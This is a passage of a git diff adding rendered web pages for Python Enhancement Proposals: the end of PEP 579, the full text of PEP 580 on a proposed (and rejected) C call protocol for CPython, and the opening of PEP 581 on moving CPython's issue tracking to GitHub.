There are a lot of classes involved, and these two tables look very different. There is no good reason why Python methods should be treated fundamentally differently from C methods. The features also differ slightly: for example, method supports __func__ but builtin_function_or_method does not.

+

Since CPython has optimizations for calls to most of these objects, +the code for dealing with them can also become complex. +A good example of this is the call_function function in Python/ceval.c.

+

Solution: all these classes should implement the C call protocol. +Then the complexity in the code can mostly be fixed by +checking for the C call protocol (tp_ccalloffset != 0) +instead of doing type checks.

+

Furthermore, it should be investigated whether some of these classes can be merged +and whether method can be re-used also for bound methods of extension types +(see PEP 576 for the latter, +keeping in mind that this may have some minor backwards compatibility issues). +This is not a goal by itself but just something to keep in mind +when working on these classes.

+
+
+

9. PyMethodDef is too limited

+

The typical way to create a cfunction or cmethod in an extension module +is by using a PyMethodDef to define it. +These are then stored in an array PyModuleDef.m_methods +(for cfunctions) or PyTypeObject.tp_methods (for cmethods). +However, because of the stable ABI (PEP 384), +we cannot change the PyMethodDef structure.

+

So, this means that we cannot add new fields for creating cfunctions/cmethods +this way. +This is probably the reason for the hack that +__doc__ and __text_signature__ are stored in the same C string +(with the __doc__ and __text_signature__ descriptors extracting +the relevant part).

+

Solution: stop assuming that a single PyMethodDef entry +is sufficient to describe a cfunction/cmethod. +Instead, we could add some flag which means that one of the PyMethodDef +fields is instead a pointer to an additional structure. +Or, we could add a flag to use two or more consecutive PyMethodDef +entries in the array to store more data. +Then the PyMethodDef array would be used only to construct +cfunctions/cmethods but it would no longer be used after that.

+
+
+

10. Slot wrappers have no custom documentation

+

Right now, slot wrappers like __init__ or __lt__ only have very +generic documentation, not at all specific to the class:

+
>>> list.__init__.__doc__
+'Initialize self.  See help(type(self)) for accurate signature.'
+>>> list.__lt__.__doc__
+'Return self<value.'
+
+
+

The same happens for the signature:

+
>>> list.__init__.__text_signature__
+'($self, /, *args, **kwargs)'
+
+
+

As you can see, slot wrappers do support __doc__ +and __text_signature__. +The problem is that these are stored in struct wrapperbase, +which is common for all wrappers of a specific slot +(for example, the same wrapperbase is used for str.__eq__ and int.__eq__).

+

Solution: rethink the slot wrapper class to allow docstrings +(and text signatures) for each instance separately.

+

This still leaves the question of how extension modules +should specify the documentation. +The PyTypeObject entries like tp_init are just function pointers, +we cannot do anything with those. +One solution would be to add entries to the tp_methods array +just for adding docstrings. +Such an entry could look like

+
{"__init__", NULL, METH_SLOTDOC, "pointer to __init__ doc goes here"}
+
+
+
+
+

11. Static methods and class methods should be callable

+

Instances of staticmethod and classmethod should be callable. +Admittedly, there is no strong use case for this, +but it has occasionally been requested (see for example [1]).

+

Making static/class methods callable would increase consistency. +First of all, function decorators typically add functionality or modify +a function, but the result remains callable. This is not true for +@staticmethod and @classmethod.

+
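For instance, on the CPython versions contemporary with this PEP (staticmethod objects only became callable in Python 3.10), the raw decorated object is not callable even though the attribute-access result is:

class C:
    @staticmethod
    def s():
        return "static"

raw = C.__dict__["s"]   # the staticmethod object itself, bypassing __get__
print(callable(C.s))    # True: __get__ unwraps it to a plain function
print(callable(raw))    # False on Python <= 3.9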

Second, class methods of extension types are already callable:

+
>>> fromhex = float.__dict__["fromhex"]
+>>> type(fromhex)
+<class 'classmethod_descriptor'>
+>>> fromhex(float, "0xff")
+255.0
+
+
+

Third, one can see function, staticmethod and classmethod +as different kinds of unbound methods: +they all become method when bound, but the implementation of __get__ +is slightly different. +From this point of view, it looks strange that function is callable +but the others are not.

+

Solution: +when changing the implementation of staticmethod, classmethod, +we should consider making instances callable. +Even if this is not a goal by itself, it may happen naturally +because of the implementation.

+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0579.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0580/index.html b/pep-0580/index.html new file mode 100644 index 00000000000..e67a1ea1edf --- /dev/null +++ b/pep-0580/index.html @@ -0,0 +1,863 @@ + + + + + + + + PEP 580 – The C call protocol | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+


+ + +
+
+
+

PEP 580 – The C call protocol

+
+
Author:
+
Jeroen Demeyer <J.Demeyer at UGent.be>
+
BDFL-Delegate:
+
Petr Viktorin
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
14-Jun-2018
+
Python-Version:
+
3.8
+
Post-History:
+
20-Jun-2018, 22-Jun-2018, 16-Jul-2018
+
+
+
+
+
+

Rejection Notice

+

This PEP is rejected in favor of PEP 590, which proposes a simpler public +C API for callable objects.

+
+
+

Abstract

+

A new “C call” protocol is proposed. +It is meant for classes representing functions or methods +which need to implement fast calling. +The goal is to generalize all existing optimizations for built-in functions +to arbitrary extension types.

+

In the reference implementation, +this new protocol is used for the existing classes +builtin_function_or_method and method_descriptor. +However, in the future, more classes may implement it.

+

NOTE: This PEP deals only with the Python/C API; it does not affect the Python language or standard library.

+
+
+

Motivation

+

The standard function/method classes builtin_function_or_method +and method_descriptor allow very efficiently calling C code. +However, they are not subclassable, making them unsuitable for many applications: +for example, they offer limited introspection support +(signatures only using __text_signature__, no arbitrary __qualname__, +no inspect.getfile()). +It’s also not possible to store additional data to implement something like +functools.partial or functools.lru_cache. +So, there are many reasons why users would want to implement custom +function/method classes (in a duck-typing sense) in C. +Unfortunately, such custom classes are necessarily slower than +the standard CPython function classes: +the bytecode interpreter has various optimizations +which are specific to instances of +builtin_function_or_method, method_descriptor, method and function.

+

This PEP also makes it possible to simplify existing code: checks for builtin_function_or_method and method_descriptor could be replaced by simply checking for and using the C call protocol. Future PEPs may implement the C call protocol for more classes, enabling even further simplifications.

+

We also design the C call protocol such that it can easily +be extended with new features in the future.

+

For more background and motivation, see PEP 579.

+
+
+

Overview

+

Currently, CPython has multiple optimizations for fast calling +for a few specific function classes. +A good example is the implementation of the opcode CALL_FUNCTION, +which has the following structure +(see the actual code):

+
if (PyCFunction_Check(func)) {
+    return _PyCFunction_FastCallKeywords(func, stack, nargs, kwnames);
+}
+else if (Py_TYPE(func) == &PyMethodDescr_Type) {
+    return _PyMethodDescr_FastCallKeywords(func, stack, nargs, kwnames);
+}
+else {
+    if (PyMethod_Check(func) && PyMethod_GET_SELF(func) != NULL) {
+        /* ... */
+    }
+    if (PyFunction_Check(func)) {
+        return _PyFunction_FastCallKeywords(func, stack, nargs, kwnames);
+    }
+    else {
+        return _PyObject_FastCallKeywords(func, stack, nargs, kwnames);
+    }
+}
+
+
+

Calling instances of these special-cased classes +using the tp_call slot is slower than using the optimizations. +The basic idea of this PEP is to enable such optimizations +for user C code, both as caller and as callee.

+

The existing class builtin_function_or_method and a few others +use a PyMethodDef structure for describing the underlying C function and its signature. +The first concrete change is that this is replaced by a new structure PyCCallDef. +This stores some of the same information as a PyMethodDef, +but with one important addition: +the “parent” of the function (the class or module where it is defined). +Note that PyMethodDef arrays are still used to construct +functions/methods but no longer for calling them.

+

Second, we want every class to be able to use such a PyCCallDef for optimizing calls, so the PyTypeObject structure gains a tp_ccalloffset field giving an offset to a PyCCallDef * in the object structure, and a flag Py_TPFLAGS_HAVE_CCALL indicating that tp_ccalloffset is valid.

+

Third, since we want to deal efficiently with unbound and bound methods too +(as opposed to only plain functions), we need to handle __self__ in the protocol: +after the PyCCallDef * in the object structure, +there is a PyObject *self field. +These two fields together are referred to as a PyCCallRoot structure.

+

The new protocol for efficiently calling objects using these new structures +is called the “C call protocol”.

+

NOTE: In this PEP, the phrases “unbound method” and “bound method” +refer to generic behavior, not to specific classes. +For example, an unbound method gets turned into a bound method +after applying __get__.

+
+
+

New data structures

+

The PyTypeObject structure gains a new field Py_ssize_t tp_ccalloffset +and a new flag Py_TPFLAGS_HAVE_CCALL. +If this flag is set, then tp_ccalloffset is assumed to be a valid +offset inside the object structure (similar to tp_dictoffset and tp_weaklistoffset). +It must be a strictly positive integer. +At that offset, a PyCCallRoot structure appears:

+
typedef struct {
+    const PyCCallDef *cr_ccall;
+    PyObject         *cr_self;  /* __self__ argument for methods */
+} PyCCallRoot;
+
+
+

The PyCCallDef structure contains everything needed to describe how +the function can be called:

+
typedef struct {
+    uint32_t  cc_flags;
+    PyCFunc   cc_func;    /* C function to call */
+    PyObject *cc_parent;  /* class or module */
+} PyCCallDef;
+
+
+

The reason for putting __self__ outside of PyCCallDef is that PyCCallDef is not meant to be changed after creating the function. A single PyCCallDef can be shared by an unbound method and multiple bound methods. This wouldn’t work if __self__ were stored inside that structure.

+

NOTE: unlike tp_dictoffset we do not allow negative numbers +for tp_ccalloffset to mean counting from the end. +There does not seem to be a use case for it and it would only complicate +the implementation.

+
+

Parent

+

The cc_parent field (accessed for example by a __parent__ +or __objclass__ descriptor from Python code) can be any Python +object, or NULL. +Custom classes are free to set cc_parent to whatever they want. +It is only used by the C call protocol if the +CCALL_OBJCLASS flag is set.

+

For methods of extension types, cc_parent points to the class +that defines the method (which may be a superclass of type(self)). +This is currently non-trivial to retrieve from a method’s code. +In the future, this can be used to access the module state via +the defining class. See the rationale of PEP 573 for details.

+

When the flag CCALL_OBJCLASS is set (as it will be for methods of +extension types), cc_parent is used for type checks like the following:

+
>>> list.append({}, "x")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: descriptor 'append' requires a 'list' object but received a 'dict'
+
+
+

For functions of modules, cc_parent is set to the module. +Currently, this is exactly the same as __self__. +However, using __self__ for the module is a quirk of the current implementation: +in the future, we want to allow functions which use __self__ +in the normal way, for implementing methods. +Such functions can still use cc_parent instead to refer to the module.

+

The parent would also typically be used to implement __qualname__. +The new C API function PyCCall_GenericGetQualname() does exactly that.

+
+
+

Using tp_print

+

We propose to replace the existing unused field tp_print +by tp_ccalloffset. +Since Py_TPFLAGS_HAVE_CCALL would not be added to +Py_TPFLAGS_DEFAULT, this ensures full backwards compatibility for +existing extension modules setting tp_print. +It also means that we can require that tp_ccalloffset is a valid +offset when Py_TPFLAGS_HAVE_CCALL is specified: +we do not need to check tp_ccalloffset != 0. +In future Python versions, we may decide that tp_print +becomes tp_ccalloffset unconditionally, +drop the Py_TPFLAGS_HAVE_CCALL flag and instead check for +tp_ccalloffset != 0.

+

NOTE: the exact layout of PyTypeObject is not part of the stable ABI. Therefore, changing the tp_print field from a printfunc (a function pointer) to a Py_ssize_t should not be a problem, even if this changes the memory layout of the PyTypeObject structure. Moreover, on all systems for which binaries are commonly built (Windows, Linux, macOS), printfunc and Py_ssize_t have the same size, so the issue of binary compatibility will not come up anyway.

+
+
+
+

The C call protocol

+

We say that a class implements the C call protocol +if it has the Py_TPFLAGS_HAVE_CCALL flag set +(as explained above, it must then set tp_ccalloffset > 0). +Such a class must implement __call__ as described in this section +(in practice, this just means setting tp_call to PyCCall_Call).

+

The cc_func field is a C function pointer, +which plays the same role as the existing ml_meth field of PyMethodDef. +Its precise signature depends on flags. +The subset of flags influencing the signature of cc_func +is given by the bitmask CCALL_SIGNATURE. +Below are the possible values for cc_flags & CCALL_SIGNATURE +together with the arguments that the C function takes. +The return value is always PyObject *. +The following are analogous to the existing PyMethodDef +signature flags:

+
    +
  • CCALL_VARARGS: +cc_func(PyObject *self, PyObject *args)
  • +
  • CCALL_VARARGS | CCALL_KEYWORDS: +cc_func(PyObject *self, PyObject *args, PyObject *kwds) +(kwds is either NULL or a dict; this dict must not be modified by the callee)
  • +
  • CCALL_FASTCALL: +cc_func(PyObject *self, PyObject *const *args, Py_ssize_t nargs)
  • +
  • CCALL_FASTCALL | CCALL_KEYWORDS: +cc_func(PyObject *self, PyObject *const *args, Py_ssize_t nargs, PyObject *kwnames) +(kwnames is either NULL or a non-empty tuple of keyword names)
  • +
  • CCALL_NOARGS: +cc_func(PyObject *self, PyObject *unused) (second argument is always NULL)
  • +
  • CCALL_O: +cc_func(PyObject *self, PyObject *arg)
  • +
+

The flag CCALL_DEFARG may be combined with any of these. +If so, the C function takes an additional argument +as first argument before self, +namely a const pointer to the PyCCallDef structure used for this call. +For example, we have the following signature:

+
    +
  • CCALL_DEFARG | CCALL_VARARGS: +cc_func(const PyCCallDef *def, PyObject *self, PyObject *args)
  • +
+

One exception is CCALL_DEFARG | CCALL_NOARGS: +the unused argument is dropped, so the signature becomes

+
    +
  • CCALL_DEFARG | CCALL_NOARGS: +cc_func(const PyCCallDef *def, PyObject *self)
  • +
+

NOTE: unlike the existing METH_... flags, +the CCALL_... constants do not necessarily represent single bits. +So checking if (cc_flags & CCALL_VARARGS) is not a valid way +for checking the signature. +There are also no guarantees of binary compatibility for these flags +between Python versions. +This allows the implementation to choose the most efficient +numerical values of the flags. +In the reference implementation, +the legal values for cc_flags & CCALL_SIGNATURE form exactly the interval [0, …, 11]. +This means that the compiler can easily +optimize a switch statement for those cases using a computed goto.

+
+

Checking __objclass__

+

If the CCALL_OBJCLASS flag is set and if cr_self is NULL +(this is the case for unbound methods of extension types), +then a type check is done: +the function must be called with at least one positional argument +and the first (typically called self) must be an instance of +cc_parent (which must be a class). +If not, a TypeError is raised.

+
+
+

Self slicing

+

If cr_self is not NULL or if the flag CCALL_SELFARG +is not set in cc_flags, then the argument passed as self +is simply cr_self.

+

If cr_self is NULL and the flag CCALL_SELFARG is set, +then the first positional argument is removed from +args and instead passed as self argument to the C function. +Effectively, the first positional argument is treated as __self__. +If there are no positional arguments, TypeError is raised.

+

This process is called “self slicing” and a function is said to have self +slicing if cr_self is NULL and CCALL_SELFARG is set.

+

Note that a CCALL_NOARGS function with self slicing effectively has +one argument, namely self. +Analogously, a CCALL_O function with self slicing has two arguments.

+
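The observable Python-level effect of self slicing already exists today for CPython's method descriptors; a brief sketch:

# Unbound call: the first positional argument is sliced off as self.
list.append([], 42)         # the C function sees self=[], arg=42

# Bound call: __self__ is already set, so no slicing happens.
m = [1].append
print(m.__self__)           # [1]
m(42)                       # the C function sees self=[1], arg=42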
+
+

Descriptor behavior

+

Classes supporting the C call protocol +must implement the descriptor protocol in a specific way.

+

This is required for an efficient implementation of bound methods: +if other code can make assumptions on what __get__ does, +it enables optimizations which would not be possible otherwise. +In particular, we want to allow sharing +the PyCCallDef structure between bound and unbound methods. +We also need a correct implementation of _PyObject_GetMethod +which is used by the LOAD_METHOD/CALL_METHOD optimization.

+

First of all, if func supports the C call protocol, +then func.__set__ and func.__delete__ must not be implemented.

+

Second, func.__get__ must behave as follows:

+
    +
  • If cr_self is not NULL, then __get__ must be a no-op +in the sense that func.__get__(obj, cls)(*args, **kwds) +behaves exactly the same as func(*args, **kwds). +It is also allowed for __get__ to be not implemented at all.
  • +
  • If cr_self is NULL, then func.__get__(obj, cls)(*args, **kwds) +(with obj not None) +must be equivalent to func(obj, *args, **kwds). +In particular, __get__ must be implemented in this case. +This is unrelated to self slicing: obj may be passed +as self argument to the C function or it may be the first positional argument.
  • +
  • If cr_self is NULL, then func.__get__(None, cls)(*args, **kwds) +must be equivalent to func(*args, **kwds).
  • +
+

There are no restrictions on the object func.__get__(obj, cls). +The latter is not required to implement the C call protocol for example. +We only specify what func.__get__(obj, cls).__call__ does.

+

For classes that do not care about __self__ and __get__ at all, +the easiest solution is to assign cr_self = Py_None +(or any other non-NULL value).

+
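These rules match how CPython's existing method descriptors already behave, which can be verified from Python; a sketch using list.append (whose descriptor corresponds to the cr_self == NULL case in the terminology above):

unbound = list.append          # a method_descriptor with no __self__
obj = [1, 2]

# func.__get__(obj, cls)(*args) is equivalent to func(obj, *args):
unbound.__get__(obj, list)(3)
unbound(obj, 4)
print(obj)                     # [1, 2, 3, 4]

# func.__get__(None, cls)(*args) is equivalent to func(*args):
unbound.__get__(None, list)(obj, 5)
print(obj)                     # [1, 2, 3, 4, 5]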
+
+

The __name__ attribute

+

The C call protocol requires that the function has a __name__ +attribute which is of type str (not a subclass).

+

Furthermore, the object returned by __name__ must be stored somewhere; +it cannot be a temporary object. +This is required because PyEval_GetFuncName +uses a borrowed reference to the __name__ attribute +(see also [2]).

+
+
+

Generic API functions

+

This section lists the new public API functions or macros +dealing with the C call protocol.

+
    +
  • int PyCCall_Check(PyObject *op): +return true if op implements the C call protocol.
  • +
+

All the functions and macros below +apply to any instance supporting the C call protocol. +In other words, PyCCall_Check(func) must be true.

+
    +
  • PyObject *PyCCall_Call(PyObject *func, PyObject *args, PyObject *kwds): +call func with positional arguments args +and keyword arguments kwds (kwds may be NULL). +This function is meant to be put in the tp_call slot.
  • +
  • PyObject *PyCCall_FastCall(PyObject *func, PyObject *const *args, Py_ssize_t nargs, PyObject *kwds): +call func with nargs positional arguments given by args[0], …, args[nargs-1]. +The parameter kwds can be NULL (no keyword arguments), +a dict with name:value items or a tuple with keyword names. +In the latter case, the keyword values are stored in the args +array, starting at args[nargs].
  • +
+

Macros to access the PyCCallRoot and PyCCallDef structures:

+
    +
  • const PyCCallRoot *PyCCall_CCALLROOT(PyObject *func): +pointer to the PyCCallRoot structure inside func.
  • +
  • const PyCCallDef *PyCCall_CCALLDEF(PyObject *func): +shorthand for PyCCall_CCALLROOT(func)->cr_ccall.
  • +
  • uint32_t PyCCall_FLAGS(PyObject *func): +shorthand for PyCCall_CCALLROOT(func)->cr_ccall->cc_flags.
  • +
  • PyObject *PyCCall_SELF(PyOject *func): +shorthand for PyCCall_CCALLROOT(func)->cr_self.
  • +
+

Generic getters, meant to be put into the tp_getset array:

+
    +
  • PyObject *PyCCall_GenericGetParent(PyObject *func, void *closure): +return cc_parent. +Raise AttributeError if cc_parent is NULL.
  • +
  • PyObject *PyCCall_GenericGetQualname(PyObject *func, void *closure): +return a string suitable for using as __qualname__. +This uses the __qualname__ of cc_parent if possible. +It also uses the __name__ attribute.
  • +
+
+
+

Profiling

+

The profiling events +c_call, c_return and c_exception are only generated +when calling actual instances of builtin_function_or_method or method_descriptor. +This is done for simplicity and also for backwards compatibility +(such that the profile function does not receive objects that it does not recognize). +In a future PEP, we may extend C-level profiling to arbitrary classes +implementing the C call protocol.

+
+
+
+

Changes to built-in functions and methods

+

The reference implementation of this PEP changes +the existing classes builtin_function_or_method and method_descriptor +to use the C call protocol. +In fact, those two classes are almost merged: +the implementation becomes very similar, but they remain separate classes +(mostly for backwards compatibility). +The PyCCallDef structure is simply stored +as part of the object structure. +Both classes use PyCFunctionObject as object structure. +This is the new layout for both classes:

+
typedef struct {
+    PyObject_HEAD
+    PyCCallDef  *m_ccall;
+    PyObject    *m_self;         /* Passed as 'self' arg to the C function */
+    PyCCallDef   _ccalldef;      /* Storage for m_ccall */
+    PyObject    *m_name;         /* __name__; str object (not NULL) */
+    PyObject    *m_module;       /* __module__; can be anything */
+    const char  *m_doc;          /* __text_signature__ and __doc__ */
+    PyObject    *m_weakreflist;  /* List of weak references */
+} PyCFunctionObject;
+
+
+

For functions of a module and for unbound methods of extension types, +m_ccall points to the _ccalldef field. +For bound methods, m_ccall points to the PyCCallDef +of the unbound method.

+

NOTE: the new layout of method_descriptor changes it +such that it no longer starts with PyDescr_COMMON. +This is purely an implementation detail and it should cause few (if any) +compatibility problems.

+
+

C API functions

+

The following function is added (also to the stable ABI):

+
    +
  • PyObject * PyCFunction_ClsNew(PyTypeObject *cls, PyMethodDef *ml, PyObject *self, PyObject *module, PyObject *parent): +create a new object with object structure PyCFunctionObject and class cls. +The entries of the PyMethodDef structure are used to construct +the new object, but the pointer to the PyMethodDef structure +is not stored. +The flags for the C call protocol are automatically determined in terms +of ml->ml_flags, self and parent.
  • +
+

The existing functions PyCFunction_New, PyCFunction_NewEx and +PyDescr_NewMethod are implemented in terms of PyCFunction_ClsNew.

+

The undocumented functions PyCFunction_GetFlags +and PyCFunction_GET_FLAGS are deprecated. +They are still artificially supported by storing the original METH_... +flags in a bitfield inside cc_flags. +Despite the fact that PyCFunction_GetFlags is technically +part of the stable ABI, +it is highly unlikely to be used that way: +first of all, it is not even documented. +Second, the flag METH_FASTCALL +is not part of the stable ABI but it is very common +(because of Argument Clinic). +So, if one cannot support METH_FASTCALL, +it is hard to imagine a use case for PyCFunction_GetFlags. +The fact that PyCFunction_GET_FLAGS and PyCFunction_GetFlags +are not used at all by CPython outside of Objects/call.c +further shows that these functions are not particularly useful.

+
+
+
+

Inheritance

+

Extension types inherit the type flag Py_TPFLAGS_HAVE_CCALL +and the value tp_ccalloffset from the base class, +provided that they implement tp_call and tp_descr_get +the same way as the base class. +Heap types never inherit the C call protocol because +that would not be safe (heap types can be changed dynamically).

+
+
+

Performance

+

This PEP should not impact the performance of existing code +(in the positive or negative sense). +It is meant to allow efficient new code to be written, +not to make existing code faster.

+

Here are a few pointers to the python-dev mailing list where +performance improvements are discussed:

+ +
+
+

Stable ABI

+

The function PyCFunction_ClsNew is added to the stable ABI.

+

None of the functions, structures or constants dealing with the C call protocol +are added to the stable ABI.

+

There are two reasons for this: +first of all, the most useful feature of the C call protocol is probably the +METH_FASTCALL calling convention. +Given that this is not even part of the public API (see also PEP 579, issue 6), +it would be strange to add anything else from the C call protocol +to the stable ABI.

+

Second, we want the C call protocol to be extensible in the future. +By not adding anything to the stable ABI, +we are free to do that without restrictions.

+
+
+

Backwards compatibility

+

There is no difference at all for the Python interface, +nor for the documented C API +(in the sense that all functions remain supported with the same functionality).

+

The only potential breakage is with C code +which accesses the internals of PyCFunctionObject and PyMethodDescrObject. +We expect very few problems because of this.

+
+
+

Rationale

+
+

Why is this better than PEP 575?

+

One of the major complaints about PEP 575 was that it was coupling functionality (the calling and introspection protocol) with the class hierarchy: a class could only benefit from the new features if it was a subclass of base_function. It may be difficult for existing classes to do that because they may have other constraints on the layout of the C object structure, coming from an existing base class or implementation details. For example, functools.lru_cache cannot implement PEP 575 as-is.

+

It also complicated the implementation precisely because changes +were needed both in the implementation details and in the class hierarchy.

+

The current PEP does not have these problems.

+
+
+

Why store the function pointer in the instance?

+

The actual information needed for calling an object +is stored in the instance (in the PyCCallDef structure) +instead of the class. +This is different from the tp_call slot or earlier attempts +at implementing a tp_fastcall slot [1].

+

The main use case is built-in functions and methods. +For those, the C function to be called does depend on the instance.

+

Note that the current protocol makes it easy to support the case +where the same C function is called for all instances: +just use a single static PyCCallDef structure for every instance.

+
+
+

Why CCALL_OBJCLASS?

+

The flag CCALL_OBJCLASS is meant to support various cases +where the class of a self argument must be checked, such as:

+
>>> list.append({}, None)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: append() requires a 'list' object but received a 'dict'
+
+>>> list.__len__({})
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: descriptor '__len__' requires a 'list' object but received a 'dict'
+
+>>> float.__dict__["fromhex"](list, "0xff")
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: descriptor 'fromhex' for type 'float' doesn't apply to type 'list'
+
+
+

In the reference implementation, only the first of these uses the new code. +The other examples show that these kind of checks appear +in multiple places, so it makes sense to add generic support for them.

+
+
+

Why CCALL_SELFARG?

+

The flag CCALL_SELFARG and the concept of self slicing +are needed to support methods: +the C function should not care +whether it is called as unbound method or as bound method. +In both cases, there should be a self argument +and this is simply the first positional argument of an unbound method call.

+

For example, list.append is a METH_O method. +Both the calls list.append([], 42) and [].append(42) should +translate to the C call list_append([], 42).

+

Thanks to the proposed C call protocol, we can support this in such a way +that both the unbound and the bound method share a PyCCallDef +structure (with the CCALL_SELFARG flag set).

+

So, CCALL_SELFARG has two advantages: +there is no extra layer of indirection for calling methods +and constructing bound methods does not require setting up a PyCCallDef structure.

+

Another minor advantage is that we could +make the error messages for a wrong call signature +more uniform between Python methods and built-in methods. +In the following example, Python is undecided whether +a method takes 1 or 2 arguments:

+
>>> class List(list):
+...     def myappend(self, item):
+...         self.append(item)
+>>> List().myappend(1, 2)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: myappend() takes 2 positional arguments but 3 were given
+>>> List().append(1, 2)
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+TypeError: append() takes exactly one argument (2 given)
+
+
+

It is currently impossible for PyCFunction_Call +to know the actual number of user-visible arguments +since it cannot distinguish at runtime between +a function (without self argument) and a bound method (with self argument). +The CCALL_SELFARG flag makes this difference explicit.

+
+
+

Why CCALL_DEFARG?

+

The flag CCALL_DEFARG gives the callee access to the PyCCallDef *. +There are various use cases for this:

+
    +
  1. The callee can use the cc_parent field, which is useful for PEP 573.
  2. +
  3. Applications are free to extend the PyCCallDef structure with user-defined +fields, which can then be accessed analogously.
  4. +
  5. In the case where the PyCCallDef structure +is part of the object structure +(this is true for example for PyCFunctionObject), +an appropriate offset can be subtracted from the PyCCallDef pointer +to get a pointer to the callable object defining that PyCCallDef.
  6. +
+

An earlier version of this PEP defined a flag CCALL_FUNCARG +instead of CCALL_DEFARG which would pass the callable object +to the callee. +This had similar use cases, but there was some ambiguity for +bound methods: should the “callable object” be the bound method +object or the original function wrapped by the method? +By passing the PyCCallDef * instead, this ambiguity is gone +since the bound method uses the PyCCallDef * from the wrapped function.

+
+
+

Replacing tp_print

+

We repurpose tp_print as tp_ccalloffset because this makes +it easier for external projects to backport the C call protocol +to earlier Python versions. +In particular, the Cython project has shown interest in doing that +(see https://mail.python.org/pipermail/python-dev/2018-June/153927.html).

+
+
+
+

Alternative suggestions

+

PEP 576 is an alternative approach to solving the same problem as this PEP. +See https://mail.python.org/pipermail/python-dev/2018-July/154238.html +for comments on the difference between PEP 576 and PEP 580.

+
+
+

Discussion

+

Links to threads on the python-dev mailing list +where this PEP has been discussed:

+ +
+
+

Reference implementation

+

The reference implementation can be found at +https://github.com/jdemeyer/cpython/tree/pep580

+

For an example of using the C call protocol, +the following branch implements functools.lru_cache using PEP 580: +https://github.com/jdemeyer/cpython/tree/lru580

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0580.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file
diff --git a/pep-0581/index.html b/pep-0581/index.html
new file mode 100644
index 00000000000..af0a5a89c73
--- /dev/null
+++ b/pep-0581/index.html
@@ -0,0 +1,413 @@
+PEP 581 – Using GitHub Issues for CPython | peps.python.org
+
+


+ + +
+
+
+

PEP 581 – Using GitHub Issues for CPython

+
+
Author:
+
Mariatta <mariatta at python.org>
+
BDFL-Delegate:
+
Barry Warsaw <barry at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Process
+
Created:
+
20-Jun-2018
+
Post-History:
+
07-Mar-2019
+
Resolution:
+
Python-Dev message
+
+
+
+
+
+

Abstract

+

This PEP outlines the rationale for migration from Python’s issue +tracker on Roundup to GitHub issues. See PEP 588 for the detailed +migration plan.

+
+
+

Rationale

+

CPython’s development moved to GitHub in February 2017. All other +projects within the PSF’s organization are hosted on GitHub and are +using GitHub issues. CPython is still using Roundup as the issue +tracker on bugs.python.org (bpo) [1].

+
+

Why GitHub?

+

GitHub has a lot of nice features, readily available out of the box, some of which aren’t available on Roundup / bpo.

+
    +
  • APIs that can be used to build integrations and automations. There are various +existing integrations and applications available from GitHub Marketplace to +help with the workflow. New applications are easily installed and enabled. +In addition, we’ve had great success with building our own GitHub bots, like +miss-islington [2], bedevere [3], and the-knights-who-say-ni [4].
  • +
  • Ability to embed/drag and drop screenshots and debug log files into GitHub +pull requests and issues.
  • +
  • Administrators and core developers can edit issues, comments, and pull requests.
  • +
  • Ability to reply to issue and pull request conversations via email.
  • +
  • Support for two factor authentication.
  • +
  • Support for markdown and emoji.
  • +
  • Preview tab, showing how a comment will be rendered, prior to +actually posting.
  • +
  • Support for voting via reactions.
  • +
  • Support for permalinks [5], allowing easy quoting and copying & pasting of source code. It is possible to automatically embed a code snippet on GitHub by pasting a permalink.
  • +
  • Core developers, volunteers, and the PSF don’t have to maintain the +issue infrastructure/site, giving us more time and resources to focus on the +development of Python.
  • +
  • Ability to automatically close issues when a PR has been merged [6].
      +
    • Note that this feature exists in bpo too.
    • +
    +
  • +
  • Lower barrier to contribution. With more than 28 million users, an open +source contributor is more likely to already have an account and be familiar +with GitHub’s interface, making it easier to start contributing.
  • +
  • Email notifications containing metadata [7], integrated with Gmail, allowing +systematic filtering of emails. While Roundup emails contain some metadata, +they’re not as extensive.
  • +
  • Additional privacy, such as offering the user a choice to hide an +email address, while still allowing communication with the user +through @-mentions.
  • +
+
+
+

Issues with Roundup / bpo

+
    +
  • Fewer than five people maintain bpo. Some of them are core developers.
  • +
  • The upstream Roundup code is in Mercurial. Without any CI available, this puts a heavy burden on the few existing maintainers in terms of reviewing, testing, and applying patches. While there is an unofficial mirror of Roundup on GitHub [8], Mercurial patches are still the main way to contribute to it.

    There is an open discussion about moving the source code of bpo to +GitHub [9]. If the source code of bpo does move to GitHub, it will +become difficult to update patches from upstream. But as long as it +is in Mercurial, it is difficult to maintain and onboard new +contributors.

    +
  • +
  • In its current state, the project is not equipped to accept lots of +contributions from people who aren’t already familiar with the code +base.
  • +
  • The user interface needs an update and redesign. It will require UX/UI research +to keep it up to date with current web standards, including accessibility.
  • +
  • Users’ email addresses were exposed.
      +
    • Note: Exposing email addresses to registered and logged-in users was a decision taken when the bpo instance was set up. This behavior was modified after PEP 581’s acceptance.
    • +
    +
  • +
  • A REST API is not currently available in bpo. There was an open issue in Roundup for adding a REST API [10]; at the time PEP 581 was proposed, the ticket had received no activity since 2016. A REST API was integrated into Roundup in February 2019, but it has not yet been integrated into bpo.
  • +
  • It sends a number of unnecessary emails and notifications. An example is the nosy email, where notifications are sent whenever someone adds themselves as “nosy”. An issue about this has been open in upstream Roundup since 2012 with little traction [11]. While this behavior can be configured, the request to configure it was not addressed.
  • +
  • Creating an account has been a hassle. There have been reports of people +having trouble creating accounts or logging in. Some examples of open tickets: +“Commas in username causes error in nosy list” [12], “An error has occurred ..” [13], +“It is not sending me the confirmation email …” [14].
  • +
+
+
+
+

Why not GitLab?

+

